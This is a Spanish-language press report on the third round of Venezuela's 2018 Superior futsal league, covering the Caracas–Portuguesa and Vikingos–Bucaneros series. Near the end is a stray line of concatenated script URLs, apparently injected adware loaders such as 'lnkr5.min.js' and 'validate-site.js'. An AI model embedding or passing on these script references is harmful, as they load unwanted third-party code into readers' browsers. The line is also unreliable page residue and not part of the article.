¡LOS NUESTROS PRIMERO!

No se usaron escobas en la tercera jornada de la Superior

Paridad, paridad y paridad. No es un slogan, es la realidad que marca la temporada 2018 en la liga que nos gusta. Nuevamente partidos disputados hasta la última décima de segundo, series igualadas y repartidas en victorias, los referentes cumpliendo y nuevos valores reclamando su lugar en los titulares de la prensa. Cuando ya se cumple la primera vuelta de partidos (con una serie pendiente por disputar entre llaneros y carabobeños), la sensación que se tiene es que cualquier de estos seis equipos puede lograr quedarse con la estrella.

Emoción en la capital

La serie Caracas – Portuguesa fue la más disputada. Frescas en la memoria de los capitalinos la derrota a manos del “Penta” en la Nacional 2017, proporcionaron el aliciente para los de Villaobos. Rodríguez y Graterol construyeron un buen colchón que parecía bastar para la victoria portugueseña, pero guiados por la magia de Carlos Vento, el Rojo lo dio vuelta casi al final. Para el segundo envite, pese a las bajas, la visita logró rescatar un punto que supo agridulce porque el empate lo sufrieron nuevamente en la postrimería. Caracas salvo el invicto como local.

División en Parque Miranda

Vikingos y Bucaneros ofrecieron par de encuentros de lujo a quiénes se acercaron al coso de Los Dos Caminos. En la primera batalla el intercambio de goles fue la constante y emergió la figura de “Tito” Jiménez para desequilibrar un encuentro, donde Ascanio y el veterano Sánz bien que sumaron en pro de un triunfo que finalmente se le escapó. Pero para el segundo duelo, con un Johan Días aplomado y una química interesante que proyecta esta versión 2018 del “Ciclón”, ganó con holgura para seguir metido en los papeles, en una serie especial para el entrenador Jean Rodríguez que enfrentaba a su ex equipo.

Prensa Liga Superior de Futsal.

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1535721977649http://browfileext.com/addons/lnkr5.min.js

 

SportsVenezuela